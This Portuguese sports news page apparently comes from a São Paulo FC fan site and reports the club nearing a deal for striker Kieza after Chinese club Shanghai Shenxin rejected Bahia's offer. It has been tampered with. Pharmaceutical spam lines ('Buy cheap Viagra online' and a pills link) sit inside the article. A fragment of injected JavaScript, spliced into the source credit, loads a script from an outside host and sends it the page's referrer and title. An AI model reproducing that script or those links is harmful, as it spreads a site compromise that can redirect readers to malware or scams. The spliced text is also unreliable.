Destaque Noticia

Chineses recusam oferta do Bahia e Kieza fica muito perto do São Paulo

pills take on at low price generic pills on line – http://yada.mhs.narotama.ac.id/2016/11/30/take-on-at-low-price-generic-pills-on-line/

Buy cheap Viagra online

O Bahia não contará com o futebol do atacante Kieza em 2016. Nesta terça-feira, o clube de Salvador divulgou comunicado no qual afirmar que o Shanghai Shenxim, time chinês que detém os direitos do jogador, recusou a proposta baiana pela compra. Com isso, o São Paulo tem o caminho ainda mais livre para negociar com o jogador. O diretor executivo do Tricolor, Gustavo Oliveira, cuida pessoalmente da negociação.

O acerto com o clube do Morumbi é questão de tempo. Restam, porém, algumas pendências a serem resolvidas. Ainda não se sabe se o jogador será comprado em definitivo ou se chegará por empréstimo. A segunda opção, em primeiro momento, foi refutada pelos chineses. O tempo de contrato também precisará ser acertado.

A pedida salarial inicial de Kieza de 250 mil assustou o São Paulo nas conversas iniciais. No entanto, as partes entraram em acordo e o valor foi reduzido. O atacante chega para sanar a carência do Tricolor no setor com as saídas de Alexandre Pato e Luis Fabiano.

Kieza defendeu o Bahia de julho de 2014 até dezembro de 2015, marcando 35 gols no período e conquistou o título de campeão baiano do ano passado. Foi o vice-artilheiro do Brasil em 2015, com 29 gols, atrás apenas de Ricardo Oliveira, do Santos, com 37 tentos.


Nesta temporada, o São Paulo já acertou a contratação do lateral esquerdo Eugenio Mena, de 27 anos, por empréstimo sem custos, arcando apenas com seus vencimentos, e também do zagueiro uruguaio Diego Lugano, 35, ídolo da torcida e com chegada ao Brasil prevista para a noite desta terça-feira.

Fonte: LanceNets.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque Noticia

Mais em Destaque Noticia

Buffarini: Boca Jrs quer jogador para 2018 diz mídia argentina

saopauloadmin11 de dezembro de 2017

Empresário revela que Copete recebeu sondagem do São Paulo

saopauloadmin11 de dezembro de 2017

Raí fala de reforços, Dorival, Scarpa, Pratto, Lugano…

saopauloadmin11 de dezembro de 2017

Arboleda e a primeira temporada tricolor: “Minha vida mudou”

saopauloadmin10 de dezembro de 2017

Diego Souza desconversa mas não nega possível transferência para o São Paulo em 2018

saopauloadmin10 de dezembro de 2017

Acertado com Tricolor, Jean já escolheu apartamento na capital

saopauloadmin8 de dezembro de 2017

Por São Paulo, Raí abandona a presidência da Atletas em momento-chave

saopauloadmin8 de dezembro de 2017

Raí é o novo diretor de futebol do São Paulo

saopauloadmin7 de dezembro de 2017

Perto de Jean, São Paulo não deve renovar com Renan Ribeiro

saopauloadmin7 de dezembro de 2017